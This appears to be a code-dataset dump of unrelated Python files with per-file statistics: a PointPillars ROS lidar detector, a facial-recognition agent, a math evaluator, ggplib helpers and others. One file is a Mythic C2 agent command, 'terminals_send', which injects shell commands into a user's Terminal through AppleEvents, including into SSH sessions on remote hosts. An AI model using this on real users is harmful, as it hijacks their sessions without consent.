max_num = torch.arange(max_num, dtype=torch.int, device=actual_num.device).view(max_num_shape)
# tiled_actual_num : [N, M, 1]
# tiled_actual_num : [[3,3,3,3,3], [4,4,4,4,4], [2,2,2,2,2]]
# title_max_num : [[0,1,2,3,4], [0,1,2,3,4], [0,1,2,3,4]]
paddings_indicator = actual_num.int() > max_num
# paddings_indicator shape : [batch_size, max_num]
return paddings_indicator
def _get_pos_neg_loss(cls_loss, labels):
# cls_loss: [N, num_anchors, num_class]
# labels: [N, num_anchors]
batch_size = cls_loss.shape[0]
if cls_loss.shape[-1] == 1 or len(cls_loss.shape) == 2:
cls_pos_loss = (labels > 0).type_as(cls_loss) * cls_loss.view(
batch_size, -1)
cls_neg_loss = (labels == 0).type_as(cls_loss) * cls_loss.view(
batch_size, -1)
cls_pos_loss = cls_pos_loss.sum() / batch_size
cls_neg_loss = cls_neg_loss.sum() / batch_size
else:
cls_pos_loss = cls_loss[..., 1:].sum() / batch_size
cls_neg_loss = cls_loss[..., 0].sum() / batch_size
return cls_pos_loss, cls_neg_loss
def _flat_nested_json_dict(json_dict, flatted, sep=".", start=""):
for k, v in json_dict.items():
if isinstance(v, dict):
_flat_nested_json_dict(v, flatted, sep, start + sep + k)
else:
flatted[start + sep + k] = v
def flat_nested_json_dict(json_dict, sep=".") -> dict:
"""flat a nested json-like dict. this function make shadow copy.
"""
flatted = {}
for k, v in json_dict.items():
if isinstance(v, dict):
_flat_nested_json_dict(v, flatted, sep, k)
else:
flatted[k] = v
return flatted
def example_convert_to_torch(example, dtype=torch.float32, device=None) -> dict:
# device = device or torch.device("cuda:0")
example_torch = {}
# float_names = ["voxels", "anchors", "reg_targets", "reg_weights", "bev_map", "rect", "Trv2c", "P2"]
float_names = ["voxels", "anchors", "reg_targets", "reg_weights", "bev_map"]
for k, v in example.items():
if k in float_names:
example_torch[k] = torch.as_tensor(v, dtype=dtype).cuda()
elif k in ["coordinates", "labels", "num_points"]:
example_torch[k] = torch.as_tensor(v, dtype=torch.int32).cuda()
elif k in ["anchors_mask"]:
example_torch[k] = torch.as_tensor(v, dtype=torch.uint8).cuda()
# torch.uint8 is now deprecated, please use a dtype torch.bool instead
else:
example_torch[k] = v
return example_torch
def _make_point_field(num_field):
msg_pf1 = pc2.PointField()
msg_pf1.name = np.str('x')
msg_pf1.offset = np.uint32(0)
msg_pf1.datatype = np.uint8(7)
msg_pf1.count = np.uint32(1)
msg_pf2 = pc2.PointField()
msg_pf2.name = np.str('y')
msg_pf2.offset = np.uint32(4)
msg_pf2.datatype = np.uint8(7)
msg_pf2.count = np.uint32(1)
msg_pf3 = pc2.PointField()
msg_pf3.name = np.str('z')
msg_pf3.offset = np.uint32(8)
msg_pf3.datatype = np.uint8(7)
msg_pf3.count = np.uint32(1)
msg_pf4 = pc2.PointField()
msg_pf4.name = np.str('intensity')
msg_pf4.offset = np.uint32(16)
msg_pf4.datatype = np.uint8(7)
msg_pf4.count = np.uint32(1)
if num_field == 4:
return [msg_pf1, msg_pf2, msg_pf3, msg_pf4]
msg_pf5 = pc2.PointField()
msg_pf5.name = np.str('label')
msg_pf5.offset = np.uint32(20)
msg_pf5.datatype = np.uint8(4)
msg_pf5.count = np.uint32(1)
return [msg_pf1, msg_pf2, msg_pf3, msg_pf4, msg_pf5]
def publish_test(np_p_ranged, frame_id):
header = Header()
header.stamp = rospy.Time()
header.frame_id = frame_id
x = np_p_ranged[:, 0].reshape(-1)
y = np_p_ranged[:, 1].reshape(-1)
z = np_p_ranged[:, 2].reshape(-1)
if np_p_ranged.shape[1] == 4:
i = np_p_ranged[:, 3].reshape(-1)
else:
i = np.zeros(np_p_ranged.shape[0], 1).reshape(-1)
cloud = np.stack((x, y, z, i))
msg_segment = pc2.create_cloud(header=header,
fields=_make_point_field(4),
points=cloud.T)
pub_points.publish(msg_segment)
def predict_kitti_to_anno(net,
example,
class_names,
center_limit_range=None,
lidar_input=False,
global_set=None):
# eval example : [0: 'voxels', 1: 'num_points', 2: 'coordinates', 3: 'rect'
# 4: 'Trv2c', 5: 'P2', 6: 'anchors', 7: 'anchors_mask'
# 8: 'image_idx', 9: 'image_shape']
# eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
# 4: 'anchor_mask', 5: 'pc_idx']
pillar_x = example[0][:, :, 0].unsqueeze(0).unsqueeze(0)
pillar_y = example[0][:, :, 1].unsqueeze(0).unsqueeze(0)
pillar_z = example[0][:, :, 2].unsqueeze(0).unsqueeze(0)
pillar_i = example[0][:, :, 3].unsqueeze(0).unsqueeze(0)
num_points_per_pillar = example[1].float().unsqueeze(0)
# Find distance of x, y, and z from pillar center
# assuming xyres_16.proto
coors_x = example[2][:, 3].float()
coors_y = example[2][:, 2].float()
x_sub = coors_x.unsqueeze(1) * 0.16 -22.96 #+ 0.08#-22.96#+ 0.08#-22.96#-19.76
y_sub = coors_y.unsqueeze(1) * 0.16 -22.96#- 19.76 #-22.96#-19.76#-22.96#-19.76
ones = torch.ones([1, 100], dtype=torch.float32, device=pillar_x.device)
x_sub_shaped = torch.mm(x_sub, ones).unsqueeze(0).unsqueeze(0)
y_sub_shaped = torch.mm(y_sub, ones).unsqueeze(0).unsqueeze(0)
num_points_for_a_pillar = pillar_x.size()[3]
mask = get_paddings_indicator(num_points_per_pillar, num_points_for_a_pillar, axis=0)
mask = mask.permute(0, 2, 1)
mask = mask.unsqueeze(1)
mask = mask.type_as(pillar_x)
coors = example[2]
anchors = example[3]
anchors_mask = example[4]
anchors_mask = torch.as_tensor(anchors_mask, dtype=torch.uint8, device=pillar_x.device)
anchors_mask = anchors_mask.byte()
# rect = example[3]
# Trv2c = example[4]
# P2 = example[5]
pc_idx = example[5]
input = [pillar_x, pillar_y, pillar_z, pillar_i,
num_points_per_pillar, x_sub_shaped, y_sub_shaped,
mask, coors, anchors, anchors_mask, pc_idx]
predictions_dicts = net(input)
# lidar_box, final_score, label_preds, pc_idx
annos = []
for i, preds_dict in enumerate(predictions_dicts):
# image_shape = batch_image_shape[i]
pc_idx = preds_dict[3]
if preds_dict[0] is not None: # bbox list
# box_2d_preds = preds_dict[0].detach().cpu().numpy() # bbox
# box_preds = preds_dict[1].detach().cpu().numpy() # bbox3d_camera
scores = preds_dict[1].detach().cpu().numpy() # scores
box_preds_lidar = preds_dict[0].detach().cpu().numpy() # box3d_lidar
# write pred to file
label_preds = preds_dict[2].detach().cpu().numpy() # label_preds
anno = kitti.get_start_result_anno()
num_example = 0
content = ''
for box_lidar, score, label in zip(
box_preds_lidar, scores, label_preds):
if center_limit_range is not None:
limit_range = np.array(center_limit_range)
if (np.any(box_lidar[:3] < limit_range[:3])
or np.any(box_lidar[:3] > limit_range[3:])):
continue
content += str(label) + " 0.0 0 0.0 0.0 0.0 0.0 0.0 " + str(box_lidar[5]) + " " + str(box_lidar[3]) + " "\
+ str(box_lidar[4]) + " " + str(box_lidar[0]) + " " + str(box_lidar[1]) + " " + str(box_lidar[2]) + " " + str(box_lidar[6]) + " " + str(score) + "\n"
anno["name"].append(class_names[int(label)])
anno["truncated"].append(0.0)
anno["occluded"].append(0)
anno["alpha"].append(-np.arctan2(-box_lidar[1], box_lidar[0]) +
box_lidar[6])
anno["bbox"].append(np.array([0, 0, 0, 0]))
anno["dimensions"].append([box_lidar[4], box_lidar[5], box_lidar[3]]) # annotate by shl
# anno["dimensions"].append(box_lidar[3:6])
anno["location"].append(box_lidar[:3])
anno["rotation_y"].append(box_lidar[6])
if global_set is not None:
for i in range(100000):
if score in global_set:
score -= 1 / 100000
else:
global_set.add(score)
break
anno["score"].append(score)
num_example += 1
content = content.strip()
def delete_nan_points(points):
new_poins = np.array([])
print(points)
for i in range(points.shape[0]):
if (np.isnan(points[i][0])) | (np.isnan(points[i][1])) | (np.isnan(points[i][2])):
pass
else:
np.row_stack((new_poins, points[i]))
return new_poins
def callback(msg):
arr_bbox = BoundingBoxArray()
# pcl_msg = pc2.read_points(msg, skip_nans=False, field_names=("x", "y", "z", "intensity", "ring"))
pcl_msg = pc2.read_points(msg, skip_nans=False, field_names=("x", "y", "z"))
# pcl_msg = pc2.read_points(msg, skip_nans=True)
# print(pcl_msg)
np_p = np.array(list(pcl_msg), dtype=np.float32)
np_p = np.column_stack((np_p, np.zeros((np_p.shape[0], 1))))
print(np_p)
# np_p = np.delete(np_p, -1, 1) # delete "ring" field
# np_p = delete_nan_points(np_p)
eval_dataset = input_reader_builder.build(
input_cfg,
model_cfg,
training=False,
voxel_generator=voxel_generator,
target_assigner=target_assigner,
inference=True,
points=np_p)
eval_dataloader = torch.utils.data.DataLoader(
eval_dataset,
batch_size=input_cfg.batch_size,
shuffle=False,
num_workers=input_cfg.num_workers,
pin_memory=False,
collate_fn=merge_second_batch)
net.eval()
global_set = None
eval_data = iter(eval_dataloader)
example = next(eval_data)
example = example_convert_to_torch(example, torch.float32)
example_tuple = list(example.values())
example_tuple[5] = torch.from_numpy(example_tuple[5])
result = predict_kitti_to_anno(net, example_tuple, class_names, center_limit_range, model_cfg.lidar_input, global_set)
print("result", result)
# def evaluate(config_path,
# model_dir,
# result_path=None,
# predict_test=False,
# ckpt_path=None,
# ref_detfile=None,
# pickle_result=True,
# read_predict_pkl_path=None):
#
# model_dir = str(Path(model_dir).resolve())
# if predict_test:
# result_name = 'predict_test'
# else:
# result_name = 'eval_results'
# if result_path is None:
# model_dir = Path(model_dir)
# result_path = model_dir / result_name
# else:
# result_path = pathlib.Path(result_path)
#
# if isinstance(config_path, str):
# config = pipeline_pb2.TrainEvalPipelineConfig()
# with open(config_path, "r") as f:
# proto_str = f.read()
# text_format.Merge(proto_str, config)
# else:
# config = config_path
#
# input_cfg = config.eval_input_reader
# model_cfg = config.model.second
# train_cfg = config.train_config
# class_names = list(input_cfg.class_names)
# center_limit_range = model_cfg.post_center_limit_range
# #########################
# # Build Voxel Generator
# #########################
# voxel_generator = voxel_builder.build(model_cfg.voxel_generator)
# bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]
# box_coder = box_coder_builder.build(model_cfg.box_coder)
# target_assigner_cfg = model_cfg.target_assigner
# target_assigner = target_assigner_builder.build(target_assigner_cfg,
# bv_range, box_coder)
#
# net = second_builder.build(model_cfg, voxel_generator, target_assigner, input_cfg.batch_size)
# net.cuda()
# if train_cfg.enable_mixed_precision:
# net.half()
# net.metrics_to_float()
# net.convert_norm_to_float(net)
#
# if ckpt_path is None:
# torchplus.train.try_restore_latest_checkpoints(model_dir, [net])
# else:
# torchplus.train.restore(ckpt_path, net)
#
# eval_dataset = input_reader_builder.build(
# input_cfg,
# model_cfg,
# training=False,
# voxel_generator=voxel_generator,
# target_assigner=target_assigner)
#
# eval_dataloader = torch.utils.data.DataLoader(
# eval_dataset,
# batch_size=input_cfg.batch_size,
# shuffle=False,
# num_workers=input_cfg.num_workers,
# pin_memory=False,
# collate_fn=merge_second_batch)
#
# if train_cfg.enable_mixed_precision:
# float_dtype = torch.float16
# else:
# float_dtype = torch.float32
#
# net.eval()
# result_path_step = result_path / f"step_{net.get_global_step()}"
# result_path_step.mkdir(parents=True, exist_ok=True)
# t = time.time()
# dt_annos = []
# global_set = None
# eval_data = iter(eval_dataloader)
# example = next(eval_data)
# example = example_convert_to_torch(example, float_dtype)
# example_tuple = list(example.values())
# example_tuple[5] = torch.from_numpy(example_tuple[5])
# if (example_tuple[3].size()[0] != input_cfg.batch_size):
# continue
#
# dt_annos += predict_kitti_to_anno(
# net, example_tuple, class_names, center_limit_range,
# model_cfg.lidar_input, global_set)
# for example in iter(eval_dataloader):
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinates', 3: 'rect'
# # 4: 'Trv2c', 5: 'P2', 6: 'anchors', 7: 'anchors_mask'
# # 8: 'image_idx', 9: 'image_shape']
#
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
# # 4: 'anchor_mask', 5: 'pc_idx']
# example = example_convert_to_torch(example, float_dtype)
# # eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
# # 4: 'anchor_mask', 5: 'pc_idx']
#
# example_tuple = list(example.values())
# example_tuple[5] = torch.from_numpy(example_tuple[5])
# # example_tuple[9] = torch.from_numpy(example_tuple[9])
#
# if (example_tuple[3].size()[0] != input_cfg.batch_size):
# continue
#
# dt_annos += predict_kitti_to_anno(
# net, example_tuple, class_names, center_limit_range,
# model_cfg.lidar_input, global_set)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='testing')
args = parser.parse_args()
model_dir = "/nfs/nas/model/songhongli/neolix_shanghai_3828/"
config_path = "/home/songhongli/Projects/pointpillars2/second/configs/pointpillars/xyres_16_4cls.proto"
if isinstance(config_path, str):
config = pipeline_pb2.TrainEvalPipelineConfig()
with open(config_path, "r") as f:
proto_str = f.read()
text_format.Merge(proto_str, config)
else:
config = config_path
input_cfg = config.eval_input_reader
model_cfg = config.model.second
train_cfg = config.train_config
class_names = list(input_cfg.class_names)
center_limit_range = model_cfg.post_center_limit_range
#########################
# Build Voxel Generator
#########################
voxel_generator = voxel_builder.build(model_cfg.voxel_generator)
bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]
box_coder = box_coder_builder.build(model_cfg.box_coder)
target_assigner_cfg = model_cfg.target_assigner
target_assigner = target_assigner_builder.build(target_assigner_cfg,
bv_range, box_coder)
net = second_builder.build(model_cfg, voxel_generator, target_assigner, input_cfg.batch_size)
net.cuda()
torchplus.train.try_restore_latest_checkpoints(model_dir, [net])
# code added for using ROS
rospy.init_node('pointpillars_ros_node')
sub_ = rospy.Subscriber("/sensor/velodyne16/all/compensator/PointCloud2", PointCloud2, callback, queue_size=1)
pub_points = rospy.Publisher("points_modified", PointCloud2, queue_size=1)
pub_arr_bbox = rospy.Publisher("pre_arr_bbox", BoundingBoxArray, queue_size=10)
# pub_bbox = rospy.Publisher("voxelnet_bbox", BoundingBox, queue_size=1)
print("[+] voxelnet_ros_node has started!")
rospy.spin()
| 37.432927
| 176
| 0.617147
| 2,496
| 18,417
| 4.269631
| 0.157452
| 0.014263
| 0.00366
| 0.004129
| 0.442714
| 0.403866
| 0.373839
| 0.363705
| 0.346439
| 0.329736
| 0
| 0.031112
| 0.25129
| 18,417
| 491
| 177
| 37.509165
| 0.741751
| 0.317967
| 0
| 0.059925
| 0
| 0
| 0.040741
| 0.016411
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037453
| false
| 0.003745
| 0.104869
| 0
| 0.168539
| 0.022472
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e5c7dba2e2083dcb5bc4c5689df3f572c63510f
| 3,112
|
py
|
Python
|
agent.py
|
AdamMiltonBarker/TassAI
|
61ae4f208f06ea39cc5b58079175f17bf1fca4c4
|
[
"MIT"
] | 1
|
2021-06-29T09:46:47.000Z
|
2021-06-29T09:46:47.000Z
|
agent.py
|
AdamMiltonBarker/TassAI
|
61ae4f208f06ea39cc5b58079175f17bf1fca4c4
|
[
"MIT"
] | 4
|
2021-06-27T16:06:43.000Z
|
2021-06-27T16:09:53.000Z
|
agent.py
|
AdamMiltonBarker/TassAI
|
61ae4f208f06ea39cc5b58079175f17bf1fca4c4
|
[
"MIT"
] | 2
|
2020-09-28T02:11:43.000Z
|
2020-10-13T15:27:41.000Z
|
#!/usr/bin/env python3
""" HIAS TassAI Facial Recognition Agent.
HIAS TassAI Facial Recognition Agent processes streams from local
or remote cameras to identify known and unknown humans.
MIT License
Copyright (c) 2021 Asociación de Investigacion en Inteligencia Artificial
Para la Leucemia Peter Moss
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files(the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Contributors:
- Adam Milton-Barker
"""
import sys
from abc import ABC, abstractmethod
from modules.AbstractAgent import AbstractAgent
from modules.helpers import helpers
from modules.model import model
from modules.read import read
from modules.stream import stream
from modules.sockets import sockets
from threading import Thread
class agent(AbstractAgent):
""" HIAS TassAI Facial Recognition Agent
HIAS TassAI Facial Recognition Agent processes
streams from local or remote cameras to identify
known and unknown humans.
"""
def set_model(self, mtype):
# Inititializes the TassAI model
self.model = model(self.helpers)
def load_model(self):
""" Loads the trained model """
# Prepares the network and data
self.model.prepare_network()
self.model.prepare_data()
def server(self):
""" Loads the API server """
# Starts the MQTT connection
self.mqtt_start()
# Inititializes the socket
self.sockets = sockets(self.helpers)
# Loads the TassAI model
self.load_model()
# Camera read and stream threads
Thread(target=read.run, args=(self, ),
daemon=True).start()
Thread(target=stream.run, args=(self, ),
daemon=True).start()
def signal_handler(self, signal, frame):
self.helpers.logger.info("Disconnecting")
self.mqtt.disconnect()
sys.exit(1)
agent = agent()
def main():
if len(sys.argv) < 2:
agent.helpers.logger.info(
"You must provide an argument")
exit()
elif sys.argv[1] not in agent.helpers.confs["agent"]["params"]:
agent.helpers.logger.info(
"Mode not supported! server, train or inference")
exit()
mode = sys.argv[1]
if mode == "classify":
agent.set_model("")
agent.inference()
elif mode == "server":
agent.set_model("")
agent.server()
if __name__ == "__main__":
main()
| 26.151261
| 78
| 0.754499
| 447
| 3,112
| 5.214765
| 0.434004
| 0.037752
| 0.027456
| 0.046332
| 0.138138
| 0.138138
| 0.11583
| 0.11583
| 0.11583
| 0.11583
| 0
| 0.003466
| 0.165488
| 3,112
| 118
| 79
| 26.372881
| 0.894109
| 0.556877
| 0
| 0.173913
| 0
| 0
| 0.089552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0
| 0.195652
| 0
| 0.326087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e604e0888e3f4c9cd3d2b535fdc4b7f1eabfe77
| 2,576
|
py
|
Python
|
Payload_Types/apfell/mythic/agent_functions/terminals_send.py
|
xorrior/Mythic
|
ea348b66e1d96e88e0e7fbabff182945cbdf12b6
|
[
"BSD-3-Clause"
] | 2
|
2021-01-28T19:35:46.000Z
|
2021-04-08T12:01:48.000Z
|
Payload_Types/apfell/mythic/agent_functions/terminals_send.py
|
xorrior/Mythic
|
ea348b66e1d96e88e0e7fbabff182945cbdf12b6
|
[
"BSD-3-Clause"
] | null | null | null |
Payload_Types/apfell/mythic/agent_functions/terminals_send.py
|
xorrior/Mythic
|
ea348b66e1d96e88e0e7fbabff182945cbdf12b6
|
[
"BSD-3-Clause"
] | 2
|
2020-12-29T02:34:13.000Z
|
2021-06-24T04:07:38.000Z
|
from CommandBase import *
import json
from MythicResponseRPC import *
class TerminalsSendArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {
"window": CommandParameter(
name="window",
type=ParameterType.Number,
description="window # to send command to",
),
"tab": CommandParameter(
name="tab",
type=ParameterType.Number,
description="tab # to send command to",
),
"command": CommandParameter(
name="command",
type=ParameterType.String,
description="command to execute",
),
}
async def parse_arguments(self):
if len(self.command_line) > 0:
if self.command_line[0] == "{":
self.load_args_from_json_string(self.command_line)
else:
raise ValueError("Missing JSON arguments")
else:
raise ValueError("Missing arguments")
class TerminalsSendCommand(CommandBase):
cmd = "terminals_send"
needs_admin = False
help_cmd = "terminals_send"
description = """
This uses AppleEvents to inject the shell command, {command}, into the specified terminal shell as if the user typed it from the keyboard. This is pretty powerful. Consider the instance where the user is SSH-ed into another machine via terminal - with this you can inject commands to run on the remote host. Just remember, the user will be able to see the command, but you can always see what they see as well with the "terminals_read contents" command.
"""
version = 1
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_remove_file = False
is_upload_file = False
author = "@its_a_feature_"
attackmapping = ["T1059", "T1184"]
argument_class = TerminalsSendArguments
async def create_tasking(self, task: MythicTask) -> MythicTask:
resp = await MythicResponseRPC(task).register_artifact(
artifact_instance="{}".format(
task.args.get_arg("command"),
),
artifact_type="Process Create",
)
resp = await MythicResponseRPC(task).register_artifact(
artifact_instance="Target Application of Terminal",
artifact_type="AppleEvent Sent",
)
return task
async def process_response(self, response: AgentResponse):
pass
| 36.8
| 457
| 0.622671
| 276
| 2,576
| 5.641304
| 0.467391
| 0.035324
| 0.038536
| 0.043674
| 0.07964
| 0.07964
| 0.07964
| 0.07964
| 0
| 0
| 0
| 0.006081
| 0.297748
| 2,576
| 69
| 458
| 37.333333
| 0.854616
| 0
| 0
| 0.16129
| 0
| 0.016129
| 0.281444
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016129
| false
| 0.016129
| 0.048387
| 0
| 0.33871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e6142fd70771c11fbb624c19a0644bc6c708693
| 623
|
py
|
Python
|
mephisto/plugins/math_expr.py
|
Kenton1989/mephisto-bot
|
50a8008c99b984a453713f480fa578bf5a8353c8
|
[
"MIT"
] | null | null | null |
mephisto/plugins/math_expr.py
|
Kenton1989/mephisto-bot
|
50a8008c99b984a453713f480fa578bf5a8353c8
|
[
"MIT"
] | null | null | null |
mephisto/plugins/math_expr.py
|
Kenton1989/mephisto-bot
|
50a8008c99b984a453713f480fa578bf5a8353c8
|
[
"MIT"
] | null | null | null |
import re
import math
import numexpr as ne
MATH_CONST = {
'pi': math.pi,
'π': math.pi,
'e': math.e,
'inf': math.inf,
'i': 1j,
'j': 1j,
}
SUB_MAP = {
# replace UTF char with ASCII char
'(': '(',
')': ')',
',': ',',
'-': '-',
'÷': '/',
'×': '*',
'+': '+',
# replace common synonym
'ln': 'log',
'lg': 'log10',
'∞': 'inf',
'mod': '%',
}
SUB_RE = re.compile('|'.join(re.escape(s) for s in SUB_MAP.keys()))
def evaluate(txt: str):
txt = SUB_RE.sub(lambda m: SUB_MAP[m.group(0)], txt)
return ne.evaluate(txt, local_dict=MATH_CONST).item()
| 16.394737
| 67
| 0.473515
| 85
| 623
| 3.411765
| 0.588235
| 0.062069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011062
| 0.274478
| 623
| 37
| 68
| 16.837838
| 0.623894
| 0.088283
| 0
| 0
| 0
| 0
| 0.077876
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.107143
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e61d7b3b7f328b277a5ef816c4995021aeb1703
| 1,185
|
py
|
Python
|
testemu/client/testemu_client/network.py
|
advaoptical/netemu
|
a418503d3829f206602e9360c05235626fa8bec5
|
[
"Apache-2.0"
] | null | null | null |
testemu/client/testemu_client/network.py
|
advaoptical/netemu
|
a418503d3829f206602e9360c05235626fa8bec5
|
[
"Apache-2.0"
] | null | null | null |
testemu/client/testemu_client/network.py
|
advaoptical/netemu
|
a418503d3829f206602e9360c05235626fa8bec5
|
[
"Apache-2.0"
] | null | null | null |
from collections import Mapping
from . import yang_models
class Meta(type):
class Interface(
yang_models
.com_adva_netemu_testemu_client_TestInterface_YangListModel):
"""
Pythonizer for Java class ``TestInterface``.
From Java package ``com.adva.netemu.testemu.client``
"""
class TestNetwork(
yang_models.com_adva_netemu_testemu_client_TestNetwork_YangModel,
metaclass=Meta):
"""
Pythonizer for Java class ``TestNetwork``.
From Java package ``com.adva.netemu.testemu.client``
"""
@property
def interfaces(self):
class List(Mapping):
@staticmethod
def __len__():
return len(self._java_object.getInterfaces())
@staticmethod
def __iter__():
for intf in self._java_object.getInterfaces():
yield type(self).Interface(intf)
@staticmethod
def __getitem__(name):
for intf in List.__iter__():
if intf.name() == name:
return intf
raise KeyError(name)
return List()
| 23.7
| 73
| 0.571308
| 112
| 1,185
| 5.732143
| 0.383929
| 0.043614
| 0.080997
| 0.124611
| 0.239875
| 0.239875
| 0.239875
| 0.127726
| 0
| 0
| 0
| 0
| 0.34346
| 1,185
| 49
| 74
| 24.183673
| 0.825193
| 0.164557
| 0
| 0.115385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.076923
| 0.038462
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e61d7b801c1c3cd496fc2afd8c46c182f86ceda
| 666
|
py
|
Python
|
asym_rlpo/representations/identity.py
|
abaisero/asym-porl
|
8a76d920e51d783bbeeeea3cd2b02efffbb33c72
|
[
"MIT"
] | 2
|
2021-08-24T22:41:36.000Z
|
2021-10-31T01:55:37.000Z
|
asym_rlpo/representations/identity.py
|
abaisero/asym-porl
|
8a76d920e51d783bbeeeea3cd2b02efffbb33c72
|
[
"MIT"
] | null | null | null |
asym_rlpo/representations/identity.py
|
abaisero/asym-porl
|
8a76d920e51d783bbeeeea3cd2b02efffbb33c72
|
[
"MIT"
] | 1
|
2021-10-13T12:27:40.000Z
|
2021-10-13T12:27:40.000Z
|
import gym
import torch
from asym_rlpo.utils.debugging import checkraise
from .base import Representation
class IdentityRepresentation(Representation):
def __init__(self, input_space: gym.spaces.Box):
super().__init__()
checkraise(
isinstance(input_space, gym.spaces.Box)
and len(input_space.shape) == 1,
TypeError,
'input_space must be Box',
)
(self.__out_dim,) = input_space.shape
@property
def dim(self):
return self.__out_dim
def forward( # pylint: disable=no-self-use
self, inputs: torch.Tensor
) -> torch.Tensor:
return inputs
| 22.2
| 52
| 0.630631
| 76
| 666
| 5.263158
| 0.526316
| 0.125
| 0.065
| 0.095
| 0.11
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002083
| 0.279279
| 666
| 29
| 53
| 22.965517
| 0.83125
| 0.040541
| 0
| 0
| 0
| 0
| 0.036107
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.190476
| 0.095238
| 0.47619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e630265553913112faaae0a442558c6d77373c7
| 8,885
|
py
|
Python
|
src/ggplib/db/lookup.py
|
richemslie/ggplib
|
8388678f311db4a9906d8a3aff71d3f0037b623b
|
[
"MIT"
] | 11
|
2019-03-02T13:49:07.000Z
|
2021-12-21T17:03:05.000Z
|
src/ggplib/db/lookup.py
|
ggplib/ggplib
|
8388678f311db4a9906d8a3aff71d3f0037b623b
|
[
"MIT"
] | 2
|
2019-05-15T18:23:50.000Z
|
2019-05-19T08:13:19.000Z
|
src/ggplib/db/lookup.py
|
ggplib/ggplib
|
8388678f311db4a9906d8a3aff71d3f0037b623b
|
[
"MIT"
] | 1
|
2020-04-02T17:35:35.000Z
|
2020-04-02T17:35:35.000Z
|
import sys
import traceback
from ggplib.util import log
from ggplib.statemachine import builder
from ggplib.db import signature
class GameInfo(object):
def __init__(self, game, gdl_str):
self.game = game
self.gdl_str = gdl_str
# might be None, depends on whether we grab it from sig.json
self.idx = None
# lazy loads in get_symbol_map()
self.sigs = None
self.symbol_map = None
# lazy loads
self.sm = None
self.model = None
def get_symbol_map(self):
if self.sigs is None:
idx, self.sigs = signature.get_index(self.gdl_str, verbose=False)
if self.idx is not None:
assert self.idx == idx
else:
self.idx = idx
self.symbol_map = signature.build_symbol_map(self.sigs, verbose=False)
def lazy_load(self, the_game_store):
if self.sm is None:
# ok here we can cache the game XXX
self.model, self.sm = builder.build_sm(self.gdl_str,
the_game_store=the_game_store,
add_to_game_store=True)
log.verbose("Lazy loading done for %s" % self.game)
def get_sm(self):
return self.sm.dupe()
class TempGameInfo(object):
def __init__(self, game, gdl_str, sm, model):
self.game = game
